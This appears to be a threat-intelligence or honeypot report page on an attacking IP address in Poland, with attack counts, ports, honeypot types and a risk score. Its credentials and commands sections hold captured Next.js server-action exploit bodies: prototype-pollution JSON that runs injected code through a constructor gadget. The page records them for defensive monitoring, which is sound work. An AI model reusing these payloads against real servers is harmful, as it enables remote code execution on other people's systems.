Active ThreatCRITICAL

195.3.222.78

Country of Origin🇵🇱 Poland
First Detection1/11/2026
Last Activity1/15/2026
ISPMEVSPACE sp. z o.o.
🎯
11,705
Total Attacks
🔌
100
Ports
📡
13
Attack Types
🦠
1
Malware

Geolocation

Country
🇵🇱 Poland
City
Unknown
ASN
AS201814
ISP
MEVSPACE sp. z o.o.

Attack Types

adbhoney
cowrie
dicompot
ciscoasa
dionaea
honeytrap
honeyaml
conpot

Attacked Ports

327683276932770327714100205332774327734916082004915449155327728201327753277732778491654916732784+80

Associated Malware

Attempted Credentials

🔐Next-Action: x/X-Nextjs-Request-Id: poop1234
4x
🔐Content-Disposition: form-data; name="1"/(empty)
4x
🔐Content-Disposition: form-data; name="0"/(empty)
4x
🔐Content-Length: 517/Connection: close
2x
🔐Content-Length: 518/Connection: close
2x
🔐{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 155170+true+3677428;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}/------WebKitFormBoundaryx570626502761
1x
🔐"$@0"/------WebKitFormBoundaryx898859589121
1x
🔐{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 325120+true+2764701;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}/------WebKitFormBoundaryx898859589121
1x
🔐POST /_next/server HTTP/1.1/Host: 51.222.138.43:23
1x
🔐POST /_next HTTP/1.1/Host: 51.222.138.43:23
1x
🔐User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136./Accept-Encoding: gzip, deflate
1x
🔐"$@0"/------WebKitFormBoundaryx505069716647
1x
🔐POST /api HTTP/1.1/Host: 51.222.138.43:23
1x
🔐{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 79057+true+6388678;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}/------WebKitFormBoundaryx505069716647
1x
🔐POST /api/route HTTP/1.1/Host: 51.222.138.43:23
1x

Executed Commands

$------WebKitFormBoundaryx80080899346x
$Accept-Encoding: gzip, deflate2x
$Next-Action: x2x
$Content-Disposition: form-data2x
$X-Nextjs-Request-Id: poop12342x
$X-Nextjs-Html-Request-Id: ilovepoop_80080899342x
$KHTML, like Gecko2x
$Content-Disposition: form-data; name="0"1x
$Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx80080899341x
$X111x

Risk Assessment

87
/100
LowMediumHighCritical